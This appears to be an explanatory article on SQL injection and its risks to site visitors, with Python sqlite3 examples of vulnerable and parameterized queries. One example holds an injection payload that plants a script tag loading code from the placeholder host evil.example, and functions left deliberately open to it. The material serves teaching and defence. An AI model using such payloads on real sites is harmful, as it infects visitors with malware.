What are SQL-injections? How can they affect my site? How do they happen and how can I avoid them?

Your site may already be under attack, but the attacker is only using your site to attack your users! This is done using something called SQL-injections.



Since Firefox (2 and 3) and MSIE 7 started using Google’s (and others’) systems for blocking sites that serve harmful web pages, the problem of SQL-injections has been put in the spotlight.

What happens is that an attacker gets their own SQL code executed against the database of the victim system, typically by submitting it through input that the site pastes into its queries unchecked. A system open to SQL-injections may be attacked in basically two ways. The first is a DoS (denial of service) attack: the attacker deletes all the tables or does something else harmful to the site, effectively bringing the whole site down.
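To make the mechanism concrete, here is a minimal sketch using Python's built-in `sqlite3` module. The `users` table, its contents and the function names are assumptions made up for illustration; a real site would use its own schema and database driver. The first function builds the query by string concatenation and can be manipulated, while the second passes the input as a bound parameter so it is treated as data only.

```python
import sqlite3


def make_db():
    # Hypothetical in-memory database with a made-up `users` table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a-secret"), ("bob", "b-secret")],
    )
    return conn


def find_user_unsafe(conn, name):
    # VULNERABLE: the input is pasted straight into the SQL text,
    # so quotes inside `name` can change the meaning of the query.
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    # Parameterized: the driver binds `name` as a value, never as SQL.
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "nobody' OR '1'='1"
    print(find_user_unsafe(conn, payload))  # the injected OR matches every row
    print(find_user_safe(conn, payload))    # no user has that literal name
```

Parameterized queries are usually the first line of defence because the query text and the user-supplied values never mix, whatever characters the input contains.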

The other form of attack that can be performed on systems open to SQL-injections is far sneakier and may not be detected at all by the site owner or the site visitors. It consists of planting client-side browser code in the database, so that every visitor's browser runs code that infects their computer with malware or viruses. This malicious software may do everything from listening in on traffic between the client (web browser) and bank sites, to connecting the client system to a botnet.
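The sketch below illustrates how such a planted script could end up in stored page content, again with Python's `sqlite3`. Everything in it is hypothetical: the `pages` and `comments` tables, the function names and the `evil.example` URL are invented for the example, and `executescript` stands in for any driver call that accepts several statements at once. It also shows a crude check a site owner might run to spot stored `<script` tags.

```python
import sqlite3

# Hypothetical attacker input: closes the INSERT, then appends a script
# tag to every stored page body. The URL is a placeholder.
PAYLOAD = (
    "nice'); UPDATE pages SET body = body || "
    "'<script src=\"http://evil.example/x.js\"></script>'; --"
)


def make_db():
    # Made-up schema: pages shown to visitors, plus visitor comments.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO pages (body) VALUES ('<p>Welcome</p>')")
    conn.execute("CREATE TABLE comments (page_id INTEGER, text TEXT)")
    return conn


def add_comment_unsafe(conn, page_id, text):
    # VULNERABLE: string formatting plus a call that runs multiple
    # statements, so the input can smuggle in its own UPDATE.
    conn.executescript(
        "INSERT INTO comments VALUES (%d, '%s');" % (page_id, text)
    )


def add_comment_safe(conn, page_id, text):
    # Parameterized: the whole input is stored as an ordinary comment.
    conn.execute("INSERT INTO comments VALUES (?, ?)", (page_id, text))
    conn.commit()


def pages_with_script(conn):
    # Crude detection: list pages whose stored body contains a script tag.
    return conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script%'"
    ).fetchall()


if __name__ == "__main__":
    safe_db = make_db()
    add_comment_safe(safe_db, 1, PAYLOAD)
    print(pages_with_script(safe_db))    # pages untouched

    unsafe_db = make_db()
    add_comment_unsafe(unsafe_db, 1, PAYLOAD)
    print(pages_with_script(unsafe_db))  # page 1 now carries the script
```

A check like `pages_with_script` only catches the most obvious payloads, so it is a complement to parameterized queries rather than a replacement for them.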

Needless to say, attacks using SQL-injections have become a problem not so much for the owner of the vulnerable site as for the visitors to said site. That said, users of the web should not underestimate the importance of good virus protection, a system update policy and a secure browsing policy.

Since the owner of the vulnerable site won’t notice any deviation from business as usual, and neither will most infected clients, nobody is the wiser to the problem.

This is why Google (and others) have started evaluating (and flagging) sites that serve harmful content, and why Firefox and MSIE (and probably others) have started blocking them.